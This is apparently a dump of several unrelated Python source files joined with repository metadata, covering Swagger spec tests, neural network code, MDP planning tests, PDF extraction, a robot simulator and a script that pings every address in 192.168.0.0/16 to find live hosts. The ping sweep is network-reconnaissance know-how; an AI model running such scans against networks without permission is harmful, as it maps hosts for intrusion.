line1 = [_cell("S1")] + [_cell_s1(key) for key in keys]
line2 = [_cell("S2")] + [_cell_s2(key) for key in keys]
line3 = [_cell("")] + [_cell_s2b(key) for key in keys]
horizontal_line = "+".join(["-" * max_head_len for k in range(len(keys) + 1)])
msg = "|".join(headers)
msg += "\n" + horizontal_line
msg += "\n" + "|".join(line1)
msg += "\n" + horizontal_line
msg += "\n" + "|".join(line2)
msg += "\n" + "|".join(line3)
print(msg)
| 1.6875 | 2 |
tests/spec/Spec/flattened_spec_test.py | Timothyyung/bravado-core | 0 | 12796778 | <gh_stars>0
# -*- coding: utf-8 -*-
import copy
import functools
import mock
import pytest
from six.moves.urllib.parse import urlparse
from swagger_spec_validator import validator20
from bravado_core import spec
from bravado_core.spec import CONFIG_DEFAULTS
from bravado_core.spec import Spec
from bravado_core.spec_flattening import _marshal_uri
from bravado_core.spec_flattening import _SpecFlattener
@pytest.fixture
def spec_flattener(minimal_swagger_spec):
return _SpecFlattener(
swagger_spec=minimal_swagger_spec,
marshal_uri_function=functools.partial(
_marshal_uri,
origin_uri=None,
),
)
@mock.patch('bravado_core.spec_flattening.warnings')
def test_no_warning_for_clashed_uris(mock_warnings, spec_flattener):
spec_flattener.warn_if_uri_clash_on_same_marshaled_representation({})
@mock.patch('bravado_core.spec_flattening.warnings')
def test_warning_for_clashed_uris(mock_warnings, spec_flattener):
clashing_uris = ['path1', 'path2']
marshaled_uri = 'SameString'
spec_flattener.marshal_uri_function = functools.partial(
lambda *args, **kwargs: marshaled_uri,
origin_uri=None,
)
spec_flattener.warn_if_uri_clash_on_same_marshaled_representation(
uri_schema_mappings={urlparse(uri): mock.Mock() for uri in clashing_uris},
)
mock_warnings.warn.assert_called_once_with(
message='{} clashed to {}'.format(', '.join(sorted(clashing_uris)), marshaled_uri),
category=Warning,
)
@pytest.mark.parametrize(
'target',
[
'',
'xhttps://host/file',
]
)
def test_marshal_url_exceptions(target):
with pytest.raises(ValueError) as excinfo:
_marshal_uri(
target_uri=urlparse(target),
origin_uri=None,
)
assert 'Invalid target: \'{target}\''.format(target=target) in str(excinfo.value)
@pytest.mark.parametrize(
'target, expected_marshaled_uri',
[
('/api_docs/file_same_directory.json', 'file:......api_docs..file_same_directory.json'),
('file:///api_docs/file_same_directory.json', 'file:......api_docs..file_same_directory.json'),
('file:///file_on_previous_directory.json', 'file:......file_on_previous_directory.json'),
('file:///directory1/file.json', 'file:......directory1..file.json'),
('http://www.service.domain/swagger/specs.json', 'http:....www.service.domain..swagger..specs.json'),
('https://www.service.domain/swagger/specs.json', 'https:....www.service.domain..swagger..specs.json'),
('/api_docs/file.json#/definitions/object', 'file:......api_docs..file.json|..definitions..object'),
('http://host/file.json#/definitions/wired|name', 'http:....host..file.json|..definitions..wired|name'),
]
)
def test_marshal_url_no_origin_uri(target, expected_marshaled_uri):
marshaled_uri = _marshal_uri(
target_uri=urlparse(target),
origin_uri=None,
)
assert marshaled_uri == expected_marshaled_uri
@pytest.mark.parametrize(
'target, expected_marshaled_uri',
[
('/api_docs/file_same_directory.json', 'lfile:file_same_directory.json'),
('file:///api_docs/file_same_directory.json', 'lfile:file_same_directory.json'),
('file:///file_on_previous_directory.json', 'lfile:....file_on_previous_directory.json'),
('file:///directory1/file.json', 'lfile:....directory1..file.json'),
('http://www.service.domain/swagger/specs.json', 'http:....www.service.domain..swagger..specs.json'),
('https://www.service.domain/swagger/specs.json', 'https:....www.service.domain..swagger..specs.json'),
('/api_docs/file.json#/definitions/object', 'lfile:file.json|..definitions..object'),
('http://host/file.json#/definitions/wired|name', 'http:....host..file.json|..definitions..wired|name'),
]
)
def test_marshal_url(target, expected_marshaled_uri):
origin_url = '/api_docs/swagger.json'
marshaled_uri = _marshal_uri(
target_uri=urlparse(target),
origin_uri=urlparse(origin_url),
)
assert marshaled_uri == expected_marshaled_uri
@mock.patch('bravado_core.spec.log', autospec=True)
def test_flattened_spec_warns_if_configured_to_not_validate_swagger_specs(
mock_log, minimal_swagger_dict,
):
petstore_spec = Spec.from_dict(minimal_swagger_dict, '', config=dict(CONFIG_DEFAULTS, validate_swagger_spec=False))
assert petstore_spec.flattened_spec == minimal_swagger_dict
mock_log.warning.assert_called_once_with(
'Flattening unvalidated specs could produce invalid specs. '
'Use it at your risk or enable `validate_swagger_specs`',
)
@pytest.mark.parametrize(
'has_origin_url', [True, False]
)
@mock.patch('bravado_core.spec_flattening.warnings')
@mock.patch('bravado_core.spec.build_http_handlers')
@mock.patch('bravado_core.spec.flattened_spec', wraps=spec.flattened_spec)
def test_flattened_spec_warning_if_no_origin_url(
wrap_flattened_spec, mock_build_http_handlers, mock_warnings, petstore_spec, has_origin_url,
):
if not has_origin_url:
petstore_spec.origin_url = None
petstore_spec.flattened_spec
wrap_flattened_spec.assert_called_once_with(swagger_spec=petstore_spec)
if has_origin_url:
assert not mock_warnings.warn.called
else:
mock_warnings.warn.assert_called_once_with(
message='It is recommended to set origin_url to your spec before flattering it. '
'Doing so internal paths will be hidden, reducing the amount of exposed information.',
category=Warning,
)
@mock.patch('bravado_core.spec.warnings')
@mock.patch('bravado_core.spec.build_http_handlers')
@mock.patch('bravado_core.spec.flattened_spec')
def test_flattened_spec_cached_result(mock_flattened_spec, mock_build_http_handlers, mock_warnings, petstore_spec):
petstore_spec.flattened_spec
petstore_spec.flattened_spec
assert mock_flattened_spec.call_count == 1
def test_flattened_spec_provide_valid_specs(
flattened_multi_file_recursive_dict, multi_file_recursive_spec,
):
flattened_spec = multi_file_recursive_spec.flattened_spec
validator20.validate_spec(
# Deep copy needed because validate_spec adds x-scope information
spec_dict=copy.deepcopy(flattened_spec),
spec_url='',
http_handlers={},
)
assert flattened_spec == flattened_multi_file_recursive_dict
def test_flattened_specs_with_no_xmodel_tags(multi_file_with_no_xmodel_spec, flattened_multi_file_with_no_xmodel_dict):
flattened_spec = multi_file_with_no_xmodel_spec.flattened_spec
validator20.validate_spec(
# Deep copy needed because validate_spec adds x-scope information
spec_dict=copy.deepcopy(flattened_spec),
spec_url='',
http_handlers={},
)
assert flattened_spec == flattened_multi_file_with_no_xmodel_dict
@pytest.mark.parametrize(
'spec_dict, expected_spec_dict',
[
[
{
'definitions': {
'model': {
'type': 'object',
'x-model': 'model',
},
},
},
{
'definitions': {
'model': {
'type': 'object',
'x-model': 'model',
},
},
},
],
[
{
'definitions': {
'model': {
'type': 'object',
'x-model': 'different-model',
},
},
},
{
'definitions': {
'different-model': {
'type': 'object',
'x-model': 'different-model',
},
},
},
],
[
{
'definitions': {
'model': {
'type': 'object',
'x-model': 'different-model',
},
'different-model': {
'type': 'string',
},
},
},
{
'definitions': {
'model': {
'type': 'object',
'x-model': 'different-model',
},
'different-model': {
'type': 'string',
},
},
},
],
[
{
'definitions': {
'model': {
'type': 'object',
'properties': {
'mod': {
'$ref': '#/definitions/model'
}
},
'x-model': 'different-model',
},
},
},
{
'definitions': {
'different-model': {
'type': 'object',
'properties': {
'mod': {
'$ref': '#/definitions/different-model'
}
},
'x-model': 'different-model',
},
},
},
],
[
{
'definitions': {
'model': {
'type': 'object',
'properties': {
'mod': {
'$ref': '#/definitions/second-model'
}
},
'x-model': 'different-model',
},
'second-model': {
'type': 'object',
'properties': {
'mod': {
'$ref': '#/definitions/model'
}
},
'x-model': 'second-model',
},
},
},
{
'definitions': {
'different-model': {
'type': 'object',
'properties': {
'mod': {
'$ref': '#/definitions/second-model'
}
},
'x-model': 'different-model',
},
'second-model': {
'type': 'object',
'properties': {
'mod': {
'$ref': '#/definitions/different-model'
}
},
'x-model': 'second-model',
},
},
},
],
]
)
def test_rename_definition_references(spec_flattener, spec_dict, expected_spec_dict):
assert spec_flattener.rename_definition_references(spec_dict) == expected_spec_dict
def test_referenced_and_discovered_models_are_not_lost_after_flattening(simple_crossfer_spec):
assert simple_crossfer_spec.flattened_spec['definitions']['pong']['x-model'] == 'pong'
| 1.890625 | 2 |
nnreslib/layers/trainable_layer.py | xausssr/nnreslib | 0 | 12796779 | <reponame>xausssr/nnreslib<gh_stars>0
from __future__ import annotations
from abc import abstractmethod
from typing import TYPE_CHECKING, Any, Optional
from .base_layer import Layer
from ..utils.initialization import Initialization
from ..utils.merge import MergeInputs
if TYPE_CHECKING:
import numpy as np
from ..utils.types import ActivationFunctions, Shape
class TrainableLayer(Layer):
# pylint:disable=unused-argument
def __init__(
self,
name: str,
activation: ActivationFunctions,
merge: Optional[MergeInputs] = None,
initializer: Initialization = Initialization(),
is_out: bool = False,
**kwargs: Any,
) -> None:
super().__init__(name, merge=merge, is_out=is_out, **kwargs)
self.initializer = initializer
self.activation = activation
self._weights: Optional[np.ndarray] = None
self._biases: Optional[np.ndarray] = None
@property
@abstractmethod
def weights_shape(self) -> Shape:
...
@property
def weights(self) -> np.ndarray:
if self._weights is None:
raise ValueError(f"Weights of layer {self.name} is not initialized")
return self._weights
def set_weights(self, data_mean: float = 0.0, data_std: float = 0.0) -> None:
self._weights = self.initializer.init_weights(self, data_mean, data_std)
@property
@abstractmethod
def biases_shape(self) -> Shape:
...
@property
def biases(self) -> np.ndarray:
if self._biases is None:
raise ValueError(f"Biases of layer {self.name} is not initialized")
return self._biases
def set_biases(self, data_mean: float = 0.0, data_std: float = 0.0) -> None:
self._biases = self.initializer.init_biases(self, data_mean, data_std)
| 2.09375 | 2 |
src/figs/figS03.py | RPGroup-PBoC/chann_cap | 2 | 12796780 | #%%
import os
import pickle
import cloudpickle
import itertools
import glob
import numpy as np
import scipy as sp
import pandas as pd
import git
# Import matplotlib stuff for plotting
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib as mpl
# Seaborn, useful for graphics
import seaborn as sns
# Import the project utils
import ccutils
# Set PBoC plotting format
ccutils.viz.set_plotting_style()
# Increase dpi
#%%
# Find home directory for repo
repo = git.Repo("./", search_parent_directories=True)
homedir = repo.working_dir
# Define directories for data and figure
figdir = f'{homedir}/fig/si/'
datadir = f'{homedir}/data/mRNA_FISH/'
mcmcdir = f'{homedir}/data/mcmc/'
# %%
# Read the data
df = pd.read_csv(f'{datadir}Jones_Brewster_2014.csv', index_col=0)
# Extract the lacUV5 data
dfUV5 = df[df.experiment == 'UV5']
# Load the flat-chain
with open(f'{mcmcdir}lacUV5_constitutive_mRNA_prior.pkl', 'rb') as file:
unpickler = pickle.Unpickler(file)
gauss_flatchain = unpickler.load()
gauss_flatlnprobability = unpickler.load()
# Generate a Pandas Data Frame with the mcmc chain
index = ['kp_on', 'kp_off', 'rm']
# Generate a data frame out of the MCMC chains
df_mcmc = pd.DataFrame(gauss_flatchain, columns=index)
# rerbsine the index with the new entries
index = df_mcmc.columns
# map value of the parameters
max_idx = np.argmax(gauss_flatlnprobability, axis=0)
kp_on, kp_off, rm = df_mcmc.iloc[max_idx, :]
# Define bins
bins = np.arange(0, dfUV5.mRNA_cell.max())
logp_mRNA = ccutils.model.log_p_m_unreg(bins, kp_on, kp_off, 1, rm)
# Plot the histogram of the data with bins of width 1
_ = plt.hist(dfUV5.mRNA_cell, bins=bins, density=1, histtype='stepfilled',
alpha=1, label='sm-FISH data', align='left', lw=0)
plt.step(bins, np.exp(logp_mRNA), color='r', ls='-', lw=1.5,
label='two-state promoter fit')
# Label the plot
plt.xlabel('mRNA / cell')
plt.ylabel('probability')
plt.legend()
plt.tight_layout()
plt.savefig(f'{figdir}/figS03.pdf', bbox_inches='tight')
| 2.15625 | 2 |
ip_search.py | HAYASAKA-Ryosuke/ip_search | 0 | 12796781 | <gh_stars>0
#!coding:utf-8
from multiprocessing import Pool
import subprocess
class Ping(object):
def __init__(self, hosts, pool_num=5):
self.hosts = hosts
self.pool_num = pool_num
def _shell(self, host):
popen = subprocess.Popen(["ping", "-c", "1", "-W", "0", host], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out = popen.communicate()
if not ("1 packets transmitted, 0 packets received, 100.0% packet loss" in str(out[0])):
print(host)
return host
def send(self):
p = Pool(self.pool_num)
return p.map(self._shell, self.hosts)
if __name__ == '__main__':
hosts = ['192.168.' + str(num1) + '.' + str(num2) for num1 in range(255) for num2 in range(255)]
ping = Ping(hosts)
ping.send()
| 2.984375 | 3 |
checkpoint.py | nisarkhanatwork/mctsnet | 5 | 12796782 | import pickle
import time
from datetime import datetime
def checkpoint(shared_model, shared_dataset, args):
try:
while True:
# Save dataset
file = open(args.data, 'wb')
pickle.dump(list(shared_dataset), file)
file.close()
# Save model
now = datetime.now().strftime("%d_%m_%H_%M")
shared_model.save('models/checkpoint_{}.model'.format(now))
time.sleep(10 * 60)
except KeyboardInterrupt:
print('exiting checkpoint')
| 2.78125 | 3 |
msdm/tests/test_policy_iteration.py | markkho/msdm | 15 | 12796783 | import unittest
import numpy as np
from frozendict import frozendict
from msdm.core.distributions import DictDistribution
from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP
from msdm.tests.domains import Counter, GNTFig6_6, Geometric, VaryingActionNumber, make_russell_norvig_grid
from msdm.domains import GridWorld
class MyTestCase(unittest.TestCase):
def test_policy_iteration(self):
mdp = Counter(3)
res = PolicyIteration().plan_on(mdp)
out = res.policy.run_on(mdp)
assert out.state_traj == (0, 1, 2)
assert out.action_traj == (1, 1, 1)
assert res.policy.action(0) == 1
assert res.policy.action(1) == 1
assert res.policy.action(2) == 1
def test_policy_iteration_geometric(self):
mdp = Geometric(p=1/13)
res = PolicyIteration(iterations=500).plan_on(mdp)
assert np.isclose(res.V[0], -13), res.V
def test_policy_iteration_varying_action_number(self):
mdp = VaryingActionNumber()
res = PolicyIteration().plan_on(mdp)
assert np.isclose(res.V[0], -2), res.V
assert res.policy.run_on(mdp).action_traj == (+1, +1)
def test_equal_value(self):
'''
In this MDP, the value at the non-initial, non-terminal corners is equal.
This means the policy at the start state should assign equal probability
to either.
'''
mdp = GridWorld(
tile_array=[
'.g',
's.',
],
feature_rewards={'g': 0},
step_cost=-1,
)
res = PolicyIteration().plan_on(mdp)
assert np.isclose(res.V[frozendict(x=0, y=1)], res.V[frozendict(x=1, y=0)])
assert res.policy.action_dist(frozendict(x=0, y=0)).\
isclose(DictDistribution({
frozendict({'dx': 0, 'dy': 0}): 0,
frozendict({'dx': 1, 'dy': 0}): 1/2,
frozendict({'dx': -1, 'dy': 0}): 0,
frozendict({'dy': 1, 'dx': 0}): 1/2,
frozendict({'dy': -1, 'dx': 0}): 0
}))
assert res.policy.action_dist(frozendict(x=0, y=1)).isclose(DictDistribution({
frozendict({'dx': 1, 'dy': 0}): 1,
}))
def test_policy_iteration_gridworld(self):
gw = GridWorld(
tile_array=[
'......g',
'...####',
'..##...',
'..#....',
'.......',
'####...',
's......',
])
pi_res = PolicyIteration()(gw)
vi_res = ValueIteration()(gw)
lrtdp = LRTDP()(gw)
assert pi_res.initial_value == vi_res.initial_value == lrtdp.initial_value
def test_policy_iteration_gridworld2(self):
gw = GridWorld((
'..g..',
'.###.',
'..#..',
'..s..'
), discount_rate=1 - 1e-5)
pi = PolicyIteration().plan_on(gw)
vi = ValueIteration().plan_on(gw)
reachable = sorted(gw.reachable_states(),
key=lambda s: (s['x'], s['y']))
pi_mat = pi.policy.as_matrix(reachable, gw.action_list)
vi_mat = vi.policy.as_matrix(reachable, gw.action_list)
assert (pi_mat == vi_mat).all()
assert all([np.isclose(pi.valuefunc[s], vi.valuefunc[s])
for s in reachable])
def test_policy_iteration_and_value_iteration_russell_norvig(self):
for discount_rate in [i/10 for i in range(1, 10)] + [.95, .99, 1.0]:
for slip_prob in [i/10 for i in range(1, 10)] + [.95, .99, 1.0]:
gw = make_russell_norvig_grid(
discount_rate=discount_rate,
slip_prob=slip_prob,
)
vi_res = ValueIteration(iterations=int(1e3)).plan_on(gw)
pi_res = PolicyIteration(iterations=int(1e3)).plan_on(gw)
assert np.isclose(vi_res._qvaluemat, pi_res._qvaluemat, atol=5e-4).all()
def test_policy_iteration_heavenorhell(self):
# technically a pomdp, but we can solve underlying mdp
from msdm.domains.heavenorhell import HeavenOrHell
for discount_rate in [i/10 for i in range(1, 10, 2)] + [.95, .99, .99999]:
for coherence in [i/10 for i in range(1, 10, 2)] + [.95, .99, .99999]:
print(discount_rate, coherence)
hh = HeavenOrHell(
coherence=coherence,
grid=
"""
hcg
#.#
#s#
""",
discount_rate=discount_rate,
heaven_reward=50,
hell_reward=-50,
)
pi = PolicyIteration().plan_on(hh)
vi = ValueIteration().plan_on(hh)
reachable = sorted(hh.reachable_states())
pi_mat = pi.policy.as_matrix(reachable, hh.action_list)
vi_mat = vi.policy.as_matrix(reachable, hh.action_list)
assert (pi_mat == vi_mat).all()
assert all([np.isclose(pi.valuefunc[s], vi.valuefunc[s])
for s in reachable])
if __name__ == '__main__':
unittest.main()
| 2.3125 | 2 |
languages/python3/pdf/pdfminer/main.py | jcnaud/snippet | 5 | 12796784 | <reponame>jcnaud/snippet<gh_stars>1-10
# coding: utf-8
## Source : https://lobstr.io/index.php/2018/07/30/scraping-document-pdf-python-pdfminer/
import os
from io import BytesIO
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.pdfpage import PDFPage
def pdf2txt(path):
"""
Extract text from PDF file, and return
the string contained inside
:param path (str) path to the .pdf file
:return: text (str) string extracted
"""
rsrcmgr = PDFResourceManager()
retstr = BytesIO()
device = TextConverter(rsrcmgr, retstr)
with open(path, "rb") as fp: # open in 'rb' mode to read PDF bytes
interpreter = PDFPageInterpreter(rsrcmgr, device)
for page in PDFPage.get_pages(fp, check_extractable=True):
interpreter.process_page(page)
device.close()
text = retstr.getvalue()
retstr.close()
return text.decode('utf-8')
def main():
print(pdf2txt('./simple1.pdf'))
if __name__ == '__main__':
main()
| 3.09375 | 3 |
osp/institutions/utils.py | davidmcclure/open-syllabus-project | 220 | 12796785 | <reponame>davidmcclure/open-syllabus-project
import tldextract
import re
from urllib.parse import urlparse
def seed_to_regex(seed):
"""
Given a URL, make a regex that matches child URLs.
Args:
seed (str)
Returns: regex
"""
parsed = urlparse(seed)
# 1 -- If the seed has a non-www subdomain, require a matching subdomain.
subdomain = ''
tld = tldextract.extract(seed)
if tld.subdomain and tld.subdomain != 'www':
subdomain = '[./]'+tld.subdomain
# 3 -- yale.edu
netloc = '[./]{0}.{1}'.format(tld.domain, tld.suffix)
# 3 -- If a path is present, require a sub-path.
path = ''
clean_path = parsed.path.rstrip('/')
if clean_path:
path = re.escape(clean_path+'/')
# Join the parts.
pattern = ''.join([subdomain, netloc, path])
return re.compile(pattern, re.I)
def strip_csv_row(row):
"""
Strip values in a CSV row, casing '' -> None.
"""
return {
key: val.strip() or None
for key, val in row.items()
}
| 3.515625 | 4 |
users/signals.py | LouaiKB/MicroscoQuiz | 2 | 12796786 | <reponame>LouaiKB/MicroscoQuiz<gh_stars>1-10
#this file is created for the signals, for each new user creat a new Profile
from django.db.models.signals import post_save
from django.contrib.auth.models import User
from django.dispatch import receiver
from .models import Profile
#when a user is saved then send this signal which be revieved by this
#receiver, this receiver is this creat_profile function
@receiver(post_save, sender=User)
def create_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_profile(sender, instance, **kwargs):
instance.profile.save() | 2.609375 | 3 |
jiant/jiant/modules/cove/cove/encoder.py | amirziai/cs229-project | 500 | 12796787 | <gh_stars>100-1000
import os
import torch
from torch import nn
from torch.nn.utils.rnn import pad_packed_sequence as unpack
from torch.nn.utils.rnn import pack_padded_sequence as pack
import torch.utils.model_zoo as model_zoo
model_urls = {
'wmt-lstm' : 'https://s3.amazonaws.com/research.metamind.io/cove/wmtlstm-8f474287.pth'
}
MODEL_CACHE = os.path.join(os.path.dirname(os.path.realpath(__file__)), '.torch')
class MTLSTM(nn.Module):
def __init__(self, n_vocab=None, vectors=None, residual_embeddings=False, layer0=False, layer1=True, trainable=False, model_cache=MODEL_CACHE):
"""Initialize an MTLSTM. If layer0 and layer1 are True, they are concatenated along the last dimension so that layer0 outputs
contribute the first 600 entries and layer1 contributes the second 600 entries. If residual embeddings is also true, inputs
are also concatenated along the last dimension with any outputs such that they form the first 300 entries.
Arguments:
n_vocab (int): If not None, initialize MTLSTM with an embedding matrix with n_vocab vectors
vectors (Float Tensor): If not None, initialize embedding matrix with specified vectors (These should be 300d CommonCrawl GloVe vectors)
residual_embedding (bool): If True, concatenate the input GloVe embeddings with contextualized word vectors as final output
layer0 (bool): If True, return the outputs of the first layer of the MTLSTM
layer1 (bool): If True, return the outputs of the second layer of the MTLSTM
trainable (bool): If True, do not detach outputs; i.e. train the MTLSTM (recommended to leave False)
model_cache (str): path to the model file for the MTLSTM to load pretrained weights (defaults to the best MTLSTM from (McCann et al. 2017) --
that MTLSTM was trained with 300d 840B GloVe on the WMT 2017 machine translation dataset.
"""
super(MTLSTM, self).__init__()
self.layer0 = layer0
self.layer1 = layer1
self.residual_embeddings = residual_embeddings
self.trainable = trainable
self.embed = False
if n_vocab is not None:
self.embed = True
self.vectors = nn.Embedding(n_vocab, 300)
if vectors is not None:
self.vectors.weight.data = vectors
state_dict = model_zoo.load_url(model_urls['wmt-lstm'], model_dir=model_cache)
if layer0:
layer0_dict = {k: v for k, v in state_dict.items() if 'l0' in k}
self.rnn0 = nn.LSTM(300, 300, num_layers=1, bidirectional=True, batch_first=True)
self.rnn0.load_state_dict(layer0_dict)
if layer1:
layer1_dict = {k.replace('l1', 'l0'): v for k, v in state_dict.items() if 'l1' in k}
self.rnn1 = nn.LSTM(600, 300, num_layers=1, bidirectional=True, batch_first=True)
self.rnn1.load_state_dict(layer1_dict)
elif layer1:
self.rnn1 = nn.LSTM(300, 300, num_layers=2, bidirectional=True, batch_first=True)
self.rnn1.load_state_dict(model_zoo.load_url(model_urls['wmt-lstm'], model_dir=model_cache))
else:
raise ValueError('At least one of layer0 and layer1 must be True.')
def forward(self, inputs, lengths, hidden=None):
"""
Arguments:
inputs (Tensor): If MTLSTM handles embedding, a Long Tensor of size (batch_size, timesteps).
Otherwise, a Float Tensor of size (batch_size, timesteps, features).
lengths (Long Tensor): lenghts of each sequence for handling padding
hidden (Float Tensor): initial hidden state of the LSTM
"""
if self.embed:
inputs = self.vectors(inputs)
if not isinstance(lengths, torch.Tensor):
lengths = torch.Tensor(lengths).long()
if inputs.is_cuda:
with torch.cuda.device_of(inputs):
lengths = lengths.cuda(torch.cuda.current_device())
lens, indices = torch.sort(lengths, 0, True)
outputs = [inputs] if self.residual_embeddings else []
len_list = lens.tolist()
packed_inputs = pack(inputs[indices], len_list, batch_first=True)
if self.layer0:
outputs0, hidden_t0 = self.rnn0(packed_inputs, hidden)
unpacked_outputs0 = unpack(outputs0, batch_first=True)[0]
_, _indices = torch.sort(indices, 0)
unpacked_outputs0 = unpacked_outputs0[_indices]
outputs.append(unpacked_outputs0)
packed_inputs = outputs0
if self.layer1:
outputs1, hidden_t1 = self.rnn1(packed_inputs, hidden)
unpacked_outputs1 = unpack(outputs1, batch_first=True)[0]
_, _indices = torch.sort(indices, 0)
unpacked_outputs1 = unpacked_outputs1[_indices]
outputs.append(unpacked_outputs1)
outputs = torch.cat(outputs, 2)
return outputs if self.trainable else outputs.detach()
| 2.5 | 2 |
tests/test_autommittee.py | rodsenra/socialgraph | 0 | 12796788 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Test some edge cases.
"""
import unittest
from socialgraph import autommittee
class TestPowerHistory(unittest.TestCase):
def setUp(self):
self.G = autommittee.Graph()
self.G.add_edge('b', 'a')
self.G.add_edge('a', 'c')
self.G.add_edge('d', 'c')
self.G.add_edge('e', 'c')
self.G.add_edge('c', 'a')
def tearDown(self):
del self.G
def test_calc_power(self):
self.assertEqual([('a', 1), ('b', 2), ('c', 5)], self.G._nodes['a'].full_power())
self.assertEqual([('c', 1), ('a', 3), ('d', 4), ('e', 5)], self.G._nodes['c'].full_power()) | 2.953125 | 3 |
pycbio/hgdata/frame.py | diekhans/read-through-analysis | 0 | 12796789 | <filename>pycbio/hgdata/frame.py
# Copyright 2006-2012 <NAME>
from pycbio.sys import PycbioException
class Frame(int):
"""Immutable object the represents a frame, integer value of 0, 1, or 2.
This is also an int. Use None if there is no frame."""
__slots__ = ()
@staticmethod
def _checkFrameValue(val):
if not ((val >= 0) and (val <= 2)):
raise TypeError("frame must be an integer in the range 0..2, got {}".format(val))
def __new__(cls, val):
obj = super(Frame, cls).__new__(cls, val)
cls._checkFrameValue(obj)
return obj
@staticmethod
def fromPhase(phase):
"""construct a Frame from a GFF/GTF like phase, which maybe an int or str"""
if isinstance(phase, str):
phase = int(phase)
if phase == 0:
return Frame(0)
elif phase == 1:
return Frame(2)
elif phase == 2:
return Frame(1)
else:
raise PycbioException("invalid phase: {}".format(phase))
def toPhase(self):
"""frame expressed as a GFF/GTF like phase, which is the number of bases
to the start of the next codon"""
if self == 0:
return 0
elif self == 1:
return 2
else:
return 1
def incr(self, amt):
"""increment frame by positive or negative amount, returning a new
Frame object. Frame of -1 already returns -1."""
if not isinstance(amt, int):
raise ValueError("can only increment a frame by an int value: {} {}".format(type(amt), amt))
val = int(self) # prevent infinite recursion
if amt >= 0:
return Frame((val + amt) % 3)
else:
amt3 = (-amt) % 3
return Frame((val - (amt - amt3)) % 3)
def __add__(self, amt):
return self.incr(amt)
def __sub__(self, amt):
return self.incr(-amt)
| 2.78125 | 3 |
spike_swarm_sim/objects/robot.py | r-sendra/SpikeSwarmSim | 0 | 12796790 | <filename>spike_swarm_sim/objects/robot.py
import numpy as np
from shapely.geometry import Point
from spike_swarm_sim.objects import WorldObject
from spike_swarm_sim.register import sensors, actuators, world_object_registry
@world_object_registry(name='robot')
class Robot(WorldObject):
"""
Base class for the robot world object.
"""
def __init__(self, pos, *args, orientation=0, **kwargs):
super(Robot, self).__init__(pos=pos, static=False, luminous=False,\
tangible=True, shape='circular', *args, **kwargs)
self._init_theta = orientation
# self.theta = 0 # initialized in reset
self.theta = orientation
self.radius = 11
self._food = False
#* Initialize sensors and actuators according to controller requirements
self.sensors = {k : s(self, **self.controller.enabled_sensors[k])\
for k, s in sensors.items()\
if k in self.controller.enabled_sensors.keys()}
self.actuators = {k : k == 'wheel_actuator' and a(self.radius, **self.controller.enabled_actuators[k])\
or a(**self.controller.enabled_actuators[k])\
for k, a in actuators.items()\
if k in self.controller.enabled_actuators.keys()}
#* Storage for actions selected by the controllers to be fed to actuators
self.planned_actions = {k : [None] for k in actuators.keys()}
#* Rendering colors (TO BE MOVED TO RENDER FILE IN THE FUTURE)
self.colorA = 'black'
self.colorB = 'black'
self.color2 = ('skyblue3', 'green')[self.trainable]
self.reset()
def step(self, neighborhood, reward=None, perturbations=None):
"""
Firstly steps all the sensors in order to perceive the environment.
Secondly, the robot executes its controller in order to compute the
actions based on the sensory information.
Lasty, the actionas are stored as planned actions to be eventually executed.
=====================
- Args:
neighborhood [list] -> list filled with the neighboring world objects.
reward [float] -> reward to be fed to the controller update rules, if any.
perturbations [list of PostProcessingPerturbation or None] -> perturbation to apply
to the stimuli before controller step.
- Returns:
State and action tuple of the current timestep. Both of them are expressed as
a dict with the sensor/actuator name and the corresponding stimuli/action.
=====================
"""
#* Sense environment surroundings.
state = self.perceive(neighborhood)
#* Apply perturbations to stimuli
for pert in perturbations:
state = pert(state, self)
#* Obtain actions using controller.
actions = self.controller.step(state, reward=reward)
#* Plan actions for future execution
self.plan_actions(actions)
# #* Handle robot food pickup
# if 'food_area_sensor' in state.keys() and bool(state['food_area_sensor'][0]):
# self.food = True
# if 'nest_sensor' in state.keys() and bool(state['nest_sensor'][0]):
# self.food = False
#* Render robot LED
self.update_colors(state, actions)
return state, actions
def update_colors(self, state, action):
colors = ['black', 'red', 'yellow', 'blue']
if 'wireless_transmitter' in self.actuators.keys():
for k, msg in enumerate(action['wireless_transmitter']['msg']):
symbol = np.argmin([np.abs(sym - msg) for sym in [0, 0.33, 0.66, 1]])
if k == 0:
self.colorA = colors[symbol]
if k == 1:
self.colorB = colors[symbol]
if 'led_actuator' in self.actuators.keys():
self.color2 = ('green', 'white', 'red')[action['led_actuator']] #[actions['wireless_transmitter']['state']]#
def plan_actions(self, actions):
for actuator, action in actions.items():
self.planned_actions[actuator] = (actuator == 'wheel_actuator')\
and [action, self.pos, self.theta] or [action]
def actuate(self):
"""
Executes the previously planned actions in order to be processed in the world.
=====================
- Args: None
- Returns: None
=====================
"""
for actuator_name, actuator in self.actuators.items():
# if actuator_name not in self.planned_actions:
# raise Exception('Error: Actuator does not have corresponding planned action.')
actuator.step(*iter(self.planned_actions[actuator_name]))
if 'wheel_actuator' in self.controller.enabled_actuators.keys() or 'target_pos_actuator' in self.controller.enabled_actuators.keys():
self._move(validated=True)
def perceive(self, neighborhood):
"""
Computes the observed stimuli by steping each of the active sensors.
=====================
- Args:
neighborhood [list] -> list filled with the neighboring world objects.
-Returns:
A dict with each sensor name as key and the sensor readings as value.
=====================
"""
return {sensor_name : sensor.step(neighborhood)\
for sensor_name, sensor in self.sensors.items()}
def _move(self, validated=False):
"""
=====================
- Args:
validated [bool] -> flag indicating if the planned movement is valid
(for example with no collisions).
- Returns: None
=====================
"""
self.pos += self.actuators['wheel_actuator'].delta_pos.astype(float) * float(validated)
self.theta += self.actuators['wheel_actuator'].delta_theta * float(validated)
# control angle range in (-pi,pi]
self.theta = self.theta % (2*np.pi) #(self.theta, self.theta + 2*np.pi)[self.theta < 0]
self.actuators['wheel_actuator'].delta_pos = np.zeros(2)
self.actuators['wheel_actuator'].delta_theta = 0.0
def reset(self):
"""
Resets the robot dynamics, sensors, actuators and controller. Position and orientation
can be randomly initialized or fixed. In the former case a seed can be specified.
=====================
- Args:
seed [int] -> seed for random intialization.
- Returns: None
=====================
"""
self.delta_pos = np.zeros(2)
self.delta_theta = 0.0
self._food = False
#* Reset Controller
